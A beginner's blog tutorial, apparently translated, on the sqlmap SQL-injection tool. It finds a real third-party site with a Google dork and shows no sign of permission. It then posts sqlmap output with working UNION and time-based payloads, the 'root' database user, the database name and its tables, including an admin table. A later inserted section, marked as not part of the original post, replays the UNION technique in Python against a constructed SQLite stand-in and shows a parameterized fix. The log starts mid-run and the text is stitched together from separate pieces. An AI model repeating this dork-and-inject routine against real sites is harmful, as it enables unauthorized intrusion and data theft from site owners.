sqlmap injection for beginners
1 What is sqlmap
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
In other words, sqlmap is an open-source tool that automatically finds and exploits SQL injection vulnerabilities and takes over the database server behind them. It has a powerful detection engine and many useful features for probing the server and taking over the database.
In short: sqlmap is a site-takeover tool.
2 Installation
Python 2.6 or 2.7; note that at the time of this 1.0-dev build only those two major versions were supported (current releases also run on Python 3). sqlmap can be installed with easy_install or fetched with git clone from the repository.
3 Finding a target
Google hacking, with the dork inurl:".php?id="
Let's just try the second hit: www.cowinbio.com/about/index.php?id=1
Let's go.
blind (heavy query)' injectable
[10:07:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:07:47] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:07:49] [INFO] target URL appears to be UNION injectable with 2 columns
[10:07:49] [WARNING] combined UNION/error-based SQL injection case found on column 1. sqlmap will try to find another column with better characteristics
[10:07:49] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 2626 HTTP(s) requests:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
Then:
(sqlmap banner, version 1.0-dev-c6d4217, http://sqlmap.org)

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:15:04

you provided 'MySQL' as a back-end DBMS, but from a past scan information on the target URL sqlmap assumes the back-end DBMS is 'mysql <5.0.11'. Do you really want to force the back-end DBMS value? [y/N] y
[10:15:22] [INFO] testing connection to the target URL
[10:15:22] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[10:15:22] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=1 AND 5889=BENCHMARK(5000000,MD5(0x6d6c765a))

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-2036 UNION ALL SELECT CONCAT(0x716a767a71,0x674971454552444a7
7526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d,0x7162766271),NULL-- -
---
[10:15:23] [INFO] testing MySQL
[10:15:23] [INFO] confirming MySQL
[10:15:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL < 5.0.0
[10:15:23] [INFO] fetching current user
current user: 'root@localhost'
And after that:
(sqlmap banner, version 1.0-dev-c6d4217, http://sqlmap.org, followed by the same legal disclaimer)

[*] starting at 10:16:44

[10:16:44] [INFO] testing connection to the target URL
[10:16:44] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[10:16:44] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=1 AND 5889=BENCHMARK(5000000,MD5(0x6d6c765a))

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-2036 UNION ALL SELECT CONCAT(0x716a767a71,0x674971454552444a79
7526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d,0x7162766271),NULL-- -
---
[10:16:45] [INFO] testing MySQL
[10:16:45] [INFO] confirming MySQL
[10:16:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL < 5.0.0
[10:16:45] [INFO] fetching current database
current database: 'cw'
Database: cw
[3 tables]
+---------+
| admin   |
| news    |
| product |
+---------+
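The runs above only show sqlmap's output. To make clear what the 'Generic UNION query (NULL) - 1 to 20 columns' step and the id=-2036 UNION ALL SELECT CONCAT(0x716a767a71,...,0x7162766271),NULL payload actually do, here is an added example that is not code from the original post and not sqlmap's own code. It replays the technique in Python against a constructed in-memory SQLite stand-in for the vulnerable about/index.php?id= page (the MySQL-only CONCAT() and BENCHMARK() from the post's payloads are replaced by SQLite's || operator, so the payload shape matches the post but not the bytes), and contrasts it with a parameterized version of the same page. The three table names are the ones the post found in 'cw'; the rows, the names vulnerable_page, fixed_page, union_inject and enumerate_tables, and the reuse of the -2036 sentinel are assumptions made for the example.

```python
import re
import sqlite3

# Constructed stand-in for the target: an in-memory SQLite database with the
# three table names the post found in database 'cw'. The rows are made up.
DB = sqlite3.connect(":memory:")
DB.executescript("""
CREATE TABLE admin(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT);
CREATE TABLE product(id INTEGER PRIMARY KEY, name TEXT);
INSERT INTO news VALUES (1, 'Company profile');
INSERT INTO admin VALUES (1, 'admin', 'constructed-secret');
""")


def vulnerable_page(id_param):
    """Models about/index.php?id=...: the raw parameter is concatenated into
    SQL, and database errors are echoed into the HTML (the condition behind
    sqlmap's 'DBMS error found in the HTTP response body' warning)."""
    query = "SELECT id, title FROM news WHERE id=" + id_param
    try:
        rows = DB.execute(query).fetchall()
    except sqlite3.Error as err:
        return "<p>DB error: %s</p>" % err
    return "".join("<p>%s: %s</p>" % row for row in rows)


def fixed_page(id_param):
    """The same page with a bound parameter: user input is data, never SQL."""
    try:
        id_value = int(id_param)
    except ValueError:
        return "<p>bad id</p>"
    rows = DB.execute("SELECT id, title FROM news WHERE id=?", (id_value,)).fetchall()
    return "".join("<p>%s: %s</p>" % row for row in rows)


# sqlmap brackets whatever it extracts with two random strings so it can find
# the value anywhere in the response; the post's payload uses 0x716a767a71
# ('qjvzq') and 0x7162766271 ('qbvbq'). SQLite has no CONCAT(), so || is used.
PREFIX, SUFFIX = "qjvzq", "qbvbq"


def union_inject(page, expression, max_cols=20):
    """Replays the 'Generic UNION query (NULL) - 1 to 20 columns' technique.

    For each candidate column count, and each column position, send
      id=-2036 UNION ALL SELECT NULL,...,'<prefix>'||(expr)||'<suffix>',...,NULL-- -
    The negative id makes the original WHERE match nothing, so the only row
    the page renders is the one the UNION supplies. Returns (ncols, column,
    value) for the first response that reflects the marked value, else None.
    """
    marker = re.compile(re.escape(PREFIX) + r"(.*?)" + re.escape(SUFFIX))
    for ncols in range(1, max_cols + 1):
        for col in range(ncols):
            cells = ["NULL"] * ncols
            cells[col] = "'%s'||(%s)||'%s'" % (PREFIX, expression, SUFFIX)
            payload = "-2036 UNION ALL SELECT %s-- -" % ",".join(cells)
            found = marker.search(page(payload))
            if found:
                return ncols, col, found.group(1)
    return None


def enumerate_tables(page):
    """Counterpart of the post's 'current database' / table-listing step."""
    hit = union_inject(page, "SELECT group_concat(name) FROM sqlite_master WHERE type='table'")
    return hit[2].split(",") if hit else []


if __name__ == "__main__":
    print(union_inject(vulnerable_page, "sqlite_version()"))  # (2, 0, '<sqlite version>')
    print(enumerate_tables(vulnerable_page))                  # ['admin', 'news', 'product']
    print(enumerate_tables(fixed_page))                       # []
```

Running the block reports what sqlmap reported for this target: a UNION with 2 columns, the marked value reflected in the first column, and the table list admin, news, product. Against fixed_page every payload is rejected as a non-integer id and nothing is extracted, which is the whole fix for the page the post was testing. The time-based payload in the post (AND 5889=BENCHMARK(...)) is the fallback sqlmap keeps for when nothing is reflected in the response; it is not reproduced here.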
Let's stop here. After all, this is a blog post; I did not go any further, and I hope readers will not try to go any further either.
Also, a friendly reminder to this site: you are not very secure.
Solemn declaration: the article above is my own original work; please indicate the source when reposting. 小三爷 thanks you here~~.